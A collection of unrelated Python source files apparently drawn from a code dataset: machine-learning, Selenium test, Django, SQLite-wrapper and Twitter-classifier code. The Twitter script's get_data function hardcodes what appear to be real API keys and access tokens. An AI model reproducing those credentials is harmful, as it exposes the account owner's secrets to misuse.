#train_1 = train.loc[:2400000,]\n #labels_1 = labels[:2400001]\n \n d_train = xgboost.DMatrix(train, labels)\n \n \n print(\"Train data ... \" )\n xgb_params = {\n \"objective\" : \"reg:logistic\"\n ,\"eval_metric\" : \"logloss\"\n ,\"eta\" : 0.1\n ,\"max_depth\" : 6\n ,\"min_child_weight\" :10\n ,\"gamma\" :0.70\n ,\"subsample\" :0.76\n ,\"colsample_bytree\" :0.95\n ,\"alpha\" :2e-05\n ,\"lambda\" :10\n }\n \n \n bst = xgboost.train(params=xgb_params, dtrain=d_train, num_boost_round=80, verbose_eval=10)\n \n importance = bst.get_fscore()\n imp = sorted(importance.items(), key=operator.itemgetter(1))\n df_imp = pd.DataFrame(imp)\n \n df_imp.to_pickle('data/df_imp.pkl')\n \n t2 = datetime.now()\n delta = t2 - t1\n print(\"Lapsed time in training : \" ,str(delta.total_seconds()))\n \n \n data_val = pd.read_pickle('data/data_val.pkl')\n d_test = xgboost.DMatrix(data_val)\n prediction = bst.predict(d_test)\n # prediction = model.predict(data_val)\n \n t3 = datetime.now()\n delta = t3 - t2\n print(\"Lapsed time in prediction : \" ,str(delta.total_seconds()))\n \n order_test = pd.read_pickle('data/result_head.pkl')\n orders = order_test.order_id.values\n products = order_test.product_id.values\n\n result = pd.DataFrame({'product_id': products, 'order_id': orders, 'prediction': prediction})\n #result.to_pickle('data/prediction_lgbm.pkl')\n result.to_csv('data/prediction_lgbm.csv', sep=',')\n \n t4 = datetime.now()\n delta = t4 - t1\n print(\"Lapsed time total : \" ,str(delta.total_seconds()))\n","sub_path":"imba403/lgbm_submition_part_2_xgb.py","file_name":"lgbm_submition_part_2_xgb.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"1203997","text":"from app.pageobject.pageobjectinfo import Selectors\nfrom app.utility.driverutility import Driverutility\nfrom app.utility.assertutility import Assertutility\nfrom selenium.webdriver.common.by import By\nfrom time import sleep\n\n\nclass Checkout(Driverutility, Assertutility):\n def search_product(self, driver):\n search_input_data = super().read_data(\"search\", \"camera\")\n webelement_search = driver.find_element(By.XPATH, Selectors.SEARCHINPUT)\n webelement_search.send_keys(search_input_data.get(\"search_keyword\"))\n super().select_input(webelement_search)\n super().wait_until_clickable(driver, \"xpath\", Selectors.SEARCHRESULT)\n webelement_search_header = driver.find_element(By.XPATH, Selectors.SEARCHRESULTHEAD)\n actual_header = super().get_text(webelement_search_header)\n expected_header = super().read_data(\"assert\", \"search_result\")\n super().check_equals(\n actual_header,\n expected_header.get(\"data\"),\n \"Actual: %s and expected: %s results are different\" % (actual_header, expected_header.get(\"data\"))\n )\n super().take_screenshot(driver)\n\n def click_product(self, driver):\n driver.find_element(By.XPATH, Selectors.PRODUCT1).click()\n super().check_element_present(driver, \"xpath\", Selectors.PRODUCTIMG)\n webelement_item = driver.find_element(By.XPATH, Selectors.ITEMHEAD)\n actual_item_text = super().get_text(webelement_item)\n expected_item_text = super().read_data(\"assert\", \"item_header\")\n super().check_equals(\n actual_item_text,\n expected_item_text.get(\"data\"),\n \"Actual: %s and expected: %s results are different\" % (actual_item_text, expected_item_text.get(\"data\"))\n )\n super().take_screenshot(driver)\n\n def add_to_cart(self, driver):\n driver.find_element(By.XPATH, Selectors.ADDINGTOCART).click()\n super().check_element_present(driver, \"xpath\", Selectors.ITEMINCART)\n super().scroll_down_to_pageend(driver)\n super().wait_until_clickable(driver, \"xpath\", Selectors.GOTOCART)\n super().check_element_present(driver, \"xpath\", Selectors.YOURCART)\n sleep(4)\n super().take_screenshot(driver)\n","sub_path":"app/pages/checkout.py","file_name":"checkout.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"43708287","text":"n = int(input())\n\n# Empty list\ntable = []\nscore_list = []\nempty = []\nunsorted = []\n\ndef repeat_cancel(score_list):\n for i in score_list:\n if i not in empty:\n empty.append(i)\n\n\ndef selection(table):\n for lst in table:\n if lst[1] == k:\n unsorted.append(lst[0])\n\n order = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n for i in order:\n for j in unsorted :\n if i == j[0]:\n print(j)\n\nfor i in range(n):\n # Taking input\n name = input()\n score = float(input())\n # Appending [name,score] into the empty table\n # The [] is necessary (creating a list inside a list)\n table.append([name,score])\n\n # Appending score into score_list\n score_list.append(score)\n\na = sorted(score_list )\nrepeat_cancel(a)\n\nk = empty[1]\n\nselection(table)\n","sub_path":"Hackerrank/2_lowest_hr.py","file_name":"2_lowest_hr.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"138985131","text":"\"\"\"Pomsheduler module views.\"\"\"\n\n# -*- coding: utf-8 -*-\n\nimport random\nimport datetime\nimport uuid\n\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.urlresolvers import reverse\nfrom django.forms.models import inlineformset_factory\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, Http404\nfrom django.utils.functional import curry\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views.generic.edit import FormMixin\nfrom django.views.generic import ListView\nfrom django.core.context_processors import csrf\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nfrom pompsheduler import forms as pomp_form\nfrom pompsheduler import models\n\n\ndef gen_id_semaine(length=50):\n \"\"\"Generate identifient semaine.\"\"\"\n random = str(uuid.uuid4()).upper()\n random = random.replace('-', '')\n return random[:length]\n\ndef addprogramm(request, programm_id=None):\n template_name = \"frontend/pompsheduler/add_programm.html\"\n args = {}\n args.update(csrf(request))\n\n programm_formset = inlineformset_factory(\n models.SemaineId,\n models.Schedule,\n form=pomp_form.EmploiTempsForm,\n max_num=14,\n extra=14,\n formset=pomp_form.EmploiTempsFormSet,\n can_delete=False)\n # On envoi la variable user comme pramètre afin de charger\n # les données du adéquate au partenaire\n programm_formset.form = staticmethod(\n curry(pomp_form.EmploiTempsForm, request=request))\n\n if request.method == 'POST':\n dateform = pomp_form.EmploiTempsDateForm(request.POST)\n if dateform.is_valid():\n queryset_formset = programm_formset(\n request.POST, request.FILES)\n if queryset_formset.is_valid():\n create_semaineid = models.SemaineId()\n create_semaineid.id_semaine = gen_id_semaine()\n create_semaineid.date_debut = dateform.cleaned_data['datedebut']\n create_semaineid.date_fin = create_semaineid.date_debut + datetime.timedelta(days=6)\n create_semaineid.save()\n queryset_formset = programm_formset(\n request.POST, request.FILES, instance=create_semaineid)\n \n queryset_formset.save()\n messages.success(request, _('C\\'est bien! Programme crée avec succès.'))\n return HttpResponseRedirect(\n reverse(\n 'pompschedule:schedulelist',\n current_app=request.resolver_match.namespace,\n )\n )\n else:\n dateform = pomp_form.EmploiTempsDateForm()\n queryset_formset = programm_formset()\n args['dateform'] = dateform\n args['form'] = queryset_formset\n return render_to_response(\n template_name,\n args,\n context_instance=RequestContext(request)\n )\n\n\nclass ScheduleListView(ListView):\n \"\"\"Cette vue perme d'afficher les collaborateurs.\"\"\"\n\n context_object_name = \"result\"\n template_name = \"frontend/pompsheduler/schedule_list.html\"\n paginate_by = 10\n http_method_names = [u'get', u'post']\n\n def dispatch(self, request, *args, **kwargs):\n \"\"\"Dispatcher.\"\"\"\n # Nous verifions que l'utilisateur existe sinon 404.\n if request.method.lower() in self.http_method_names:\n handler = getattr(\n self, request.method.lower(), self.http_method_not_allowed)\n else:\n handler = self.http_method_not_allowed\n self.request = request\n self.args = args\n self.kwargs = kwargs\n\n if 'user_id' in self.kwargs:\n if self.request.user.is_anonymous():\n messages.success(\n request, _(\n 'Cher visiteur, '\n 'vous devez vous connecter pour pouvoir générer un '\n 'programme de travail.'))\n return HttpResponseRedirect(\n reverse(\n 'account_login',\n current_app=request.resolver_match.namespace,\n )\n )\n self.user = get_object_or_404(\n User,\n pk=self.kwargs.get('user_id', None),\n )\n\n return handler(request, *args, **kwargs)\n\n def get_queryset(self):\n \"\"\"Custom get_queryset.\"\"\"\n queryset = models.Schedule.objects.order_by(\n 'semaineid',).distinct(\n 'semaineid')\n return queryset\n\n def get_context_data(self, **kwargs):\n \"\"\"Context data.\"\"\"\n context = super(ScheduleListView, self).get_context_data(**kwargs)\n context['meta_description'] = _(\n 'Listing du tous les programmes de travail du personnel employer.')\n return context\n\n\nclass DetailScheduleView(ListView):\n \"\"\"Content Schedule by identifient view.\"\"\"\n\n context_object_name = \"result\"\n template_name = \"frontend/pompsheduler/detail_schedule.html\"\n http_method_names = [u'get']\n allow_empty = False\n\n def dispatch(self, request, *args, **kwargs):\n \"\"\"Dispatcher.\"\"\"\n # Nous verifions que l'utilisateur existe sinon 404.\n if request.method.lower() in self.http_method_names:\n handler = getattr(\n self, request.method.lower(), self.http_method_not_allowed)\n else:\n handler = self.http_method_not_allowed\n\n if 'schedule_id' not in self.kwargs:\n raise PermissionDenied\n\n self.kwargs['detailschedule'] = models.Schedule.objects.filter(\n id_semaine=self.kwargs.get('schedule_id', None)).order_by(\n 'id_semaine').distinct('id_semaine')[:1]\n\n return handler(request, *args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n \"\"\"Get elemen by kwargs.\"\"\"\n query = self.get_queryset()\n self.object_list = query.filter(id_semaine=self.kwargs.get(\n 'schedule_id', None))\n allow_empty = self.get_allow_empty()\n if not allow_empty and len(self.object_list) == 0:\n raise Http404(\n _(\n u\"Votre réquête ne donne aucun résultat. \"\n \"Assurez-vous d\\' avoir réellement cliqué le lien.\"))\n context = self.get_context_data(object_list=self.object_list)\n return self.render_to_response(context)\n\n def get_queryset(self):\n \"\"\"Custom get_queryset.\"\"\"\n queryset = models.Schedule.objects.all()\n\n return queryset\n\n def get_context_data(self, **kwargs):\n \"\"\"Context data.\"\"\"\n context = super(DetailScheduleView, self).get_context_data(**kwargs)\n context['meta_description'] = _('Programme détaillé de la semaine')\n context['programm'] = self.kwargs['detailschedule'][0]\n return context\n","sub_path":"pompsheduler/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"488115188","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('myapp', '0028_auto_20150929_1012'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='like',\n name='date_like',\n field=models.DateTimeField(default=datetime.datetime.now, blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='like',\n name='ip',\n field=models.IPAddressField(default='0.0.0.0'),\n preserve_default=False,\n ),\n ]\n","sub_path":"myapp/migrations/0029_auto_20150929_1019.py","file_name":"0029_auto_20150929_1019.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"569216123","text":"'''\nThe MIT License (MIT)\n\nPortions Copyright (c) 2015-2018, The OmniDB Team\nPortions Copyright (c) 2017-2018, 2ndQuadrant Limited\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n'''\n\nimport os.path\nimport re\nfrom collections import OrderedDict\nfrom enum import Enum\nimport OmniDB_app.include.Spartacus as Spartacus\nimport OmniDB_app.include.Spartacus.Database as Database\nimport OmniDB_app.include.Spartacus.Utils as Utils\n\n'''\n------------------------------------------------------------------------\nTemplate\n------------------------------------------------------------------------\n'''\nclass TemplateType(Enum):\n EXECUTE = 1\n SCRIPT = 2\n\nclass Template:\n def __init__(self, p_text, p_type=TemplateType.EXECUTE):\n self.v_text = p_text\n self.v_type = p_type\n\n'''\n------------------------------------------------------------------------\nSQLite\n------------------------------------------------------------------------\n'''\nclass SQLite:\n def __init__(self, p_service, p_conn_id=0, p_alias='', p_foreignkeys=True):\n self.v_alias = p_alias\n self.v_db_type = 'sqlite'\n self.v_conn_string = ''\n self.v_conn_id = p_conn_id\n self.v_server = ''\n self.v_port = ''\n self.v_service = p_service\n self.v_user = ''\n self.v_schema = ''\n self.v_connection = Spartacus.Database.SQLite(p_service, p_foreignkeys)\n\n self.v_has_schema = False\n self.v_has_functions = False\n self.v_has_procedures = False\n self.v_has_sequences = False\n self.v_has_primary_keys = True\n self.v_has_foreign_keys = True\n self.v_has_uniques = True\n self.v_has_indexes = True\n self.v_has_checks = False\n self.v_has_excludes = False\n self.v_has_rules = False\n self.v_has_triggers = False\n self.v_has_partitions = True\n\n self.v_has_update_rule = True\n self.v_can_rename_table = True\n self.v_rename_table_command = \"alter table #p_table_name# rename to #p_new_table_name#\"\n self.v_create_pk_command = \"constraint #p_constraint_name# primary key (#p_columns#)\"\n self.v_create_fk_command = \"constraint #p_constraint_name# foreign key (#p_columns#) references #p_r_table_name# (#p_r_columns#) #p_delete_update_rules#\"\n self.v_create_unique_command = \"constraint #p_constraint_name# unique (#p_columns#)\"\n self.v_can_alter_type = False\n self.v_can_alter_nullable = False\n self.v_can_rename_column = False\n self.v_can_add_column = True\n self.v_add_column_command = \"alter table #p_table_name# add column #p_column_name# #p_data_type# #p_nullable#\"\n self.v_can_drop_column = False\n self.v_can_add_constraint = False\n self.v_can_drop_constraint = False\n self.v_create_index_command = \"create index #p_index_name# on #p_table_name# (#p_columns#)\";\n self.v_create_unique_index_command = \"create unique index #p_index_name# on #p_table_name# (#p_columns#)\"\n self.v_drop_index_command = \"drop index #p_index_name#\"\n self.v_update_rules = [\n \"NO ACTION\",\n\t\t\t\"RESTRICT\",\n\t\t\t\"SET NULL\",\n\t\t\t\"SET DEFAULT\",\n\t\t\t\"CASCADE\"\n ]\n self.v_delete_rules = [\n \"NO ACTION\",\n\t\t\t\"RESTRICT\",\n\t\t\t\"SET NULL\",\n\t\t\t\"SET DEFAULT\",\n\t\t\t\"CASCADE\"\n ]\n self.v_reserved_words = []\n self.v_console_help = \"Console tab.\"\n self.v_use_server_cursor = False\n\n def GetName(self):\n return self.v_service\n\n def PrintDatabaseInfo(self):\n if '/' in self.v_service:\n v_strings = self.v_service.split('/')\n return v_strings[len(v_strings)-1]\n else:\n return self.v_service\n\n def PrintDatabaseDetails(self):\n return 'Local File'\n\n def HandleUpdateDeleteRules(self, p_update_rule, p_delete_rule):\n v_rules = ''\n if p_update_rule.strip() != \"\":\n v_rules += \" on update \" + p_update_rule + \" \"\n if p_delete_rule.strip() != \"\":\n v_rules += \" on delete \" + p_delete_rule + \" \"\n return v_rules\n\n def TestConnection(self):\n v_return = ''\n try:\n if os.path.isfile(self.v_service):\n v_return = 'Connection successful.'\n else:\n v_return = 'File does not exist, if you try to manage this connection a database file will be created.'\n except Exception as exc:\n v_return = str(exc)\n return v_return\n\n def QueryTables(self):\n return self.v_connection.Query('''\n select name as table_name\n\t\t from sqlite_master\n\t\t\twhere type = 'table'\n ''', True)\n\n def QueryTablesFields(self, p_table=None):\n v_table_columns_all = Spartacus.Database.DataTable()\n v_table_columns_all.Columns = [\n 'column_name',\n 'data_type',\n 'nullable',\n 'data_length',\n 'data_precision',\n 'data_scale',\n 'table_name'\n ]\n if p_table:\n v_tables = Spartacus.Database.DataTable()\n v_tables.Columns.append('table_name')\n v_tables.Rows.append(OrderedDict(zip(v_tables.Columns, [p_table])))\n else:\n v_tables = self.QueryTables()\n for v_table in v_tables.Rows:\n v_table_columns_tmp = self.v_connection.Query(\"pragma table_info('{0}')\".format(v_table['table_name']), True)\n v_table_columns = Spartacus.Database.DataTable()\n v_table_columns.Columns = [\n 'column_name',\n 'data_type',\n 'nullable',\n 'data_length',\n 'data_precision',\n 'data_scale',\n 'table_name'\n ]\n for r in v_table_columns_tmp.Rows:\n v_row = []\n v_row.append(r['name'])\n if '(' in r['type']:\n v_index = r['type'].find('(')\n v_data_type = r['type'].lower()[0 : v_index]\n if ',' in r['type']:\n v_sizes = r['type'][v_index + 1 : r['type'].find(')')].split(',')\n v_data_length = ''\n v_data_precision = v_sizes[0]\n v_data_scale = v_sizes[1]\n else:\n v_data_length = r['type'][v_index + 1 : r['type'].find(')')]\n v_data_precision = ''\n v_data_scale = ''\n else:\n v_data_type = r['type'].lower()\n v_data_length = ''\n v_data_precision = ''\n v_data_scale = ''\n v_row.append(v_data_type)\n if r['notnull'] == '1':\n v_row.append('NO')\n else:\n v_row.append('YES')\n v_row.append(v_data_length)\n v_row.append(v_data_precision)\n v_row.append(v_data_scale)\n v_row.append(v_table['table_name'])\n v_table_columns.Rows.append(OrderedDict(zip(v_table_columns.Columns, v_row)))\n v_table_columns_all.Merge(v_table_columns)\n return v_table_columns_all\n\n def QueryTablesForeignKeys(self, p_table=None):\n v_fks_all = Spartacus.Database.DataTable()\n v_fks_all.Columns = [\n 'r_table_name',\n 'table_name',\n 'r_column_name',\n 'column_name',\n 'constraint_name',\n 'update_rule',\n 'delete_rule',\n 'table_schema',\n 'r_table_schema'\n ]\n if p_table:\n v_tables = Spartacus.Database.DataTable()\n v_tables.Columns.append('table_name')\n v_tables.Rows.append(OrderedDict(zip(v_tables.Columns, [p_table])))\n else:\n v_tables = self.QueryTables()\n for v_table in v_tables.Rows:\n v_fks_tmp = self.v_connection.Query(\"pragma foreign_key_list('{0}')\".format(v_table['table_name']), True)\n v_fks = Spartacus.Database.DataTable()\n v_fks.Columns = [\n 'r_table_name',\n 'table_name',\n 'r_column_name',\n 'column_name',\n 'constraint_name',\n 'update_rule',\n 'delete_rule',\n 'table_schema',\n 'r_table_schema'\n ]\n for r in v_fks_tmp.Rows:\n v_row = []\n v_row.append(r['table'])\n v_row.append(v_table['table_name'])\n v_row.append(r['to'])\n v_row.append(r['from'])\n v_row.append(v_table['table_name'] + '_fk_' + str(r['id']))\n v_row.append(r['on_update'])\n v_row.append(r['on_delete'])\n v_row.append('')\n v_row.append('')\n v_fks.Rows.append(OrderedDict(zip(v_fks.Columns, v_row)))\n v_fks_all.Merge(v_fks)\n return v_fks_all\n\n def QueryTablesPrimaryKeys(self, p_table=None):\n v_pks_all = Spartacus.Database.DataTable()\n v_pks_all.Columns = [\n 'constraint_name',\n 'column_name',\n 'table_name'\n ]\n if p_table:\n v_tables = Spartacus.Database.DataTable()\n v_tables.Columns.append('table_name')\n v_tables.Rows.append(OrderedDict(zip(v_tables.Columns, [p_table])))\n else:\n v_tables = self.QueryTables()\n for v_table in v_tables.Rows:\n v_pks_tmp = self.v_connection.Query(\"pragma table_info('{0}')\".format(v_table['table_name']), True)\n v_pks = Spartacus.Database.DataTable()\n v_pks.Columns = [\n 'constraint_name',\n 'column_name',\n 'table_name'\n ]\n for r in v_pks_tmp.Rows:\n if r['pk'] != 0:\n v_row = []\n v_row.append('pk_' + v_table['table_name'])\n v_row.append(r['name'])\n v_row.append(v_table['table_name'])\n v_pks.Rows.append(OrderedDict(zip(v_pks.Columns, v_row)))\n v_pks_all.Merge(v_pks)\n return v_pks_all\n\n # DOING\n def QueryTablesUniques(self, p_table=None):\n v_uniques_all = Spartacus.Database.DataTable()\n v_uniques_all.Columns = [\n 'constraint_name',\n 'column_name',\n 'table_name'\n ]\n if p_table:\n v_tables = self.v_connection.Query('''\n select name,\n sql\n from sqlite_master\n where type = 'table'\n and name = '{0}'\n '''.format(p_table), True)\n else:\n v_tables = self.v_connection.Query('''\n select name,\n sql\n from sqlite_master\n where type = 'table'\n ''', True)\n v_regex = re.compile(r\"\\s+\")\n for v_table in v_tables.Rows:\n v_sql = v_table['sql'].lower().strip()\n if 'unique' in v_sql:\n v_index = v_sql.find('(') + 1\n v_filtered_sql = v_sql[v_index : ]\n v_formatted = v_regex.sub(' ', v_filtered_sql)\n\n def QueryTablesIndexes(self, p_table=None):\n pass\n\n def QueryDataLimited(self, p_query, p_count=-1):\n if p_count != -1:\n self.v_connection.Open()\n v_data = self.v_connection.QueryBlock(p_query, p_count, True)\n self.v_connection.Close()\n return v_data\n else:\n return self.v_connection.Query(p_query, True)\n\n def QueryTableRecords(self, p_column_list, p_table, p_filter, p_count=-1):\n v_limit = ''\n if p_count != -1:\n v_limit = ' limit ' + p_count\n return self.v_connection.Query('''\n select {0}\n from {1} t\n {2}\n {3}\n '''.format(\n p_column_list,\n p_table,\n p_filter,\n v_limit\n ), True\n )\n\n def TemplateCreateTable(self):\n pass\n\n def TemplateAlterTable(self):\n pass\n\n def TemplateDropTable(self):\n return Template('DROP TABLE #table_name#')\n\n def TemplateCreateIndex(self):\n pass\n\n def TemplateDropIndex(self):\n pass\n","sub_path":"OmniDB/OmniDB_app/include/OmniDatabase/SQLite.py","file_name":"SQLite.py","file_ext":"py","file_size_in_byte":13396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"12906345","text":"import re\nimport math\nimport tweepy\nfrom nltk import FreqDist\nfrom nltk.corpus import wordnet\n\n\n#for classifierV1\ndef taxonomy(cluster_name):\n hyponyms_first_level = []\n hyponyms_second_level = []\n hyponyms_thirt_level = []\n hyponyms_fourth_level = []\n tree_hyponyms = []\n tree_final = []\n for r in cluster_name:\n label_cluster = wordnet.synsets(r)\n\n ########################################################\n # In this section, i create a structure (tree style) of hyponyms until fourth depth level. In this way\n # I improved the probability to find the most frequent words of the target X in the 'cluster' label considered\n # every structure contains only values of the its hyponyms\n for w in range(0, len(label_cluster)):\n x = label_cluster[w].hyponyms()\n if x:\n hyponyms_first_level.extend(label_cluster[w].hyponyms())\n\n for i in range(0, len(hyponyms_first_level)):\n x = hyponyms_first_level[i].hyponyms()\n if x:\n hyponyms_second_level.extend(x)\n\n for i in range(0, len(hyponyms_second_level)):\n x = hyponyms_second_level[i].hyponyms()\n if x:\n hyponyms_thirt_level.extend(x)\n\n for i in range(0, len(hyponyms_thirt_level)):\n x = hyponyms_thirt_level[i].hyponyms()\n if x:\n hyponyms_fourth_level.extend(x)\n\n tree_hyponyms.extend(hyponyms_first_level)\n tree_hyponyms.extend(hyponyms_second_level)\n tree_hyponyms.extend(hyponyms_thirt_level)\n tree_hyponyms.extend(hyponyms_fourth_level)\n\n tree_final.append([w for w in tree_hyponyms])\n tree_hyponyms.clear()\n hyponyms_first_level.clear()\n hyponyms_second_level.clear()\n hyponyms_thirt_level.clear()\n hyponyms_fourth_level.clear()\n return tree_final\n\n\ndef findToTreeHyponyms(listX,tree_hyponyms):\n\n for a in listX:\n word_without_label = wordnet.synsets(a[0])\n for z in word_without_label:\n for i in range(0,len(tree_hyponyms)):\n if (word_without_label):\n #s=z.wup_similarity(tree_hyponyms[i]) #Otherwise, return similarity, if it's very high and break cycle!\n if z == tree_hyponyms[i]:\n return 1,z\n\n return 0,0\n\n\ndef main_classifierV1(user_nameX,user_nameY,most_common1,most_common2,tree_hyponyms):\n cluster_label=[('music'),('physics'),('orientalism'),('philosophy'),('astronomy'),('art'),('history'),('politics')]\n\n print('ClassifierV1')\n print(user_nameX)\n for i in range(0,len(cluster_label)):\n result,hit=findToTreeHyponyms(most_common1,tree_hyponyms[i])\n if(result):\n print('Interest: ',cluster_label[i])\n\n print(user_nameY)\n for i in range(0, len(cluster_label)):\n result, hit = findToTreeHyponyms(most_common2,tree_hyponyms[i])\n if (result):\n print('Interest: ', cluster_label[i])\n print('\\n')\n\n\ndef sim_vectorial(doc_w1,doc_align_2,doc_w2):\n scalar_product=0.0\n lenght_norm2=0.0\n lenght_norm1=0.0\n for i in zip(doc_w1,doc_align_2):\n scalar_product= scalar_product + i[0]*i[1]\n\n for i in doc_w1:\n lenght_norm1=lenght_norm1 + math.pow(i,2)\n\n for a in doc_w2:\n lenght_norm2 = lenght_norm2 + math.pow(a,2)\n\n\n if scalar_product == 0: return 0 #totally different\n else:\n return (scalar_product/((math.sqrt(lenght_norm1)) * (math.sqrt(lenght_norm2))))\n\n\ndef get_data(source1,source2):\n # enter the corresponding information from your Twitter application ( these are my access credential):\n CONSUMER_KEY = 'NM4xHHBwm7fiBQjf0X4QfdN8X'\n CONSUMER_SECRET = 'u6pnGad8o11sNhLiY77voEbAUawHejgGiVgxKBwPFVKLyLyRbD'\n ACCESS_KEY = '251060755-lUeE2kxqXjMfL5hLqzmo4EuyuWo4wYmqcihTEU0o'\n ACCESS_SECRET = 'sUCSFY1PkPkVxVD5P96EixYzCjJnUapeXmzyJ8HQ1UW2s'\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)\n api = tweepy.API(auth, wait_on_rate_limit=True,\n wait_on_rate_limit_notify=True) # This is a standard of the server twitter, probably to prevent too many requests by bot\n\n list_tweetX = []\n list_tweetY = []\n\n # Get tweet post from target X and Y\n for page in tweepy.Cursor(api.user_timeline, id=source1).pages():\n for item in page:\n list_tweetX.append(item.text)\n\n for page in tweepy.Cursor(api.user_timeline, id=source2).pages():\n for item in page:\n list_tweetY.append(item.text)\n\n return list_tweetX,list_tweetY\n\n\ndef sim_word_net(j, z1):\n for i in z1:\n if (j == i): return True #so, the term exists in this document( or it's a synonym )\n return False\n\n\n#it computes the weighted schema of the documents not labeled\ndef tf_idf(list1,clusters):\n temp=[]\n temp_repl=[]\n\n #doc1 weighted\n for i in list1:\n if not i in temp_repl: #i don't consider the same words\n temp_repl.append(i)\n\n #tf\n n_i=1 #of course\n fr_i=list1.count(i)\n\n\n #idf\n for z in range(0,len(clusters)):\n if (sim_word_net(i,clusters[z])):\n n_i=n_i + 1\n\n w= ((1 + math.log10(fr_i))) * (math.log10((1 + 2 / n_i))) #tf-idf\n temp.append(w)\n\n\n return temp\n\n#weighted schema for the set documents, and alignment of all document set and doc not labeled\ndef tf_idf_cluster(cluster_cluster,clusters_weighted,not_replicated):\n\n temp = []\n temp_repl = []\n\n # doc1 weighted\n for i in range(0,len(cluster_cluster)):\n for j in range(0, len(cluster_cluster[i])):\n if not cluster_cluster[i][j] in temp_repl: # i don't consider the same words\n temp_repl.append(cluster_cluster[i][j])\n\n # tf\n n_i = 1 # of course\n fr_i = cluster_cluster[i].count(cluster_cluster[i][j])\n\n\n # idf\n for z in range(0, len(cluster_cluster)):\n if (sim_word_net(i, cluster_cluster[z])):\n n_i = n_i + 1\n\n w = ((1 + math.log10(fr_i))) * (math.log10((1 + 2 / n_i))) # tf-idf\n temp.append(w)\n\n clusters_weighted.append([w for w in temp])\n temp.clear()\n not_replicated.append([w for w in temp_repl])\n temp_repl.clear()\n\n\ndef alignment_doc_clusters(list_target,clusters_weighted,not_replicated,gold):\n silver = []\n for itemI in range(0,len(not_replicated)):\n for itemJ in range(0,len(not_replicated[itemI])):\n if not_replicated[itemI][itemJ] in list_target:\n silver.append(clusters_weighted[itemI][not_replicated[itemI].index(not_replicated[itemI][itemJ])])\n else:\n silver.append(0)\n gold.append([w for w in silver])\n silver.clear()\n\n\n#cleaning of the text\ndef clean_text(original_list):\n list_splitted=[]\n list_clean=[]\n for i in original_list:\n list_splitted.append(i.split())\n\n #grammar file. i will erase all useless words\n grammarlist=[]\n try:\n with open('data_set/grammarList', 'r') as f:\n grammarlist.append(f.read().splitlines())\n\n\n except IOError:\n print('file not found!')\n exit()\n\n\n for i in range(0, len(list_splitted)):\n\n\n for j in range(0, len(list_splitted[i])):\n\n if not re.search('https?|RT|[^A-Za-z]|amp|[ah|ha]+', list_splitted[i][j]):\n list_splitted[i][j]=re.sub('•|‘|\"|”|!|“|,|:|&|;|/|\\+|\\?|…|[.]+|-|–|—|→|\\(|\\)', '', list_splitted[i][j].lower()) #i clean the text from link replytweet and @tag\n if not (len(list_splitted[i][j]) < 4 ):\n if not (any(list_splitted[i][j].lower() in s for s in grammarlist)):\n list_clean.append(list_splitted[i][j].lower())\n\n f.close()\n return list_clean\n\n\n#This function gets data from files. The files are labeled by humans and it represents the reference model\n#new files not labeled will be labeled following the reference model. In this way, the algorithm of classification will become\n#an algorithm supervisioned.\ndef get_cluster(name_cluster):\n try:\n l = []\n with open('data_set/category/'+name_cluster, 'r') as f:\n for item in f:\n l.extend(item.split())\n return l\n f.close()\n except IOError:\n print('File not found!')\n exit('Exit')\n\n\ndef get_twitter_data():\n try:\n l = []\n with open('data_set/top_users', 'r') as f:\n for item in f:\n l.extend(item.splitlines())\n f.close()\n return l\n except IOError:\n print('File not found!')\n exit('Exit')\n\n\n\ndef main_area():\n cluster_label = [('music'), ('physics'), ('orientalism'), ('philosophy'), ('astronomy'), ('art'), ('history'),\n ('politics')]\n cluster_cluster = []\n clusters_weighted = []\n not_replicated = []\n print('Loading')\n tree_hyponyms=taxonomy(cluster_label)\n print('- Taxonomy clusters created')\n\n for i in cluster_label:\n cluster_list = get_cluster(i)\n cluster_clean = clean_text(cluster_list)\n cluster_cluster.append(cluster_clean)\n print('- Clusters cleaned')\n\n 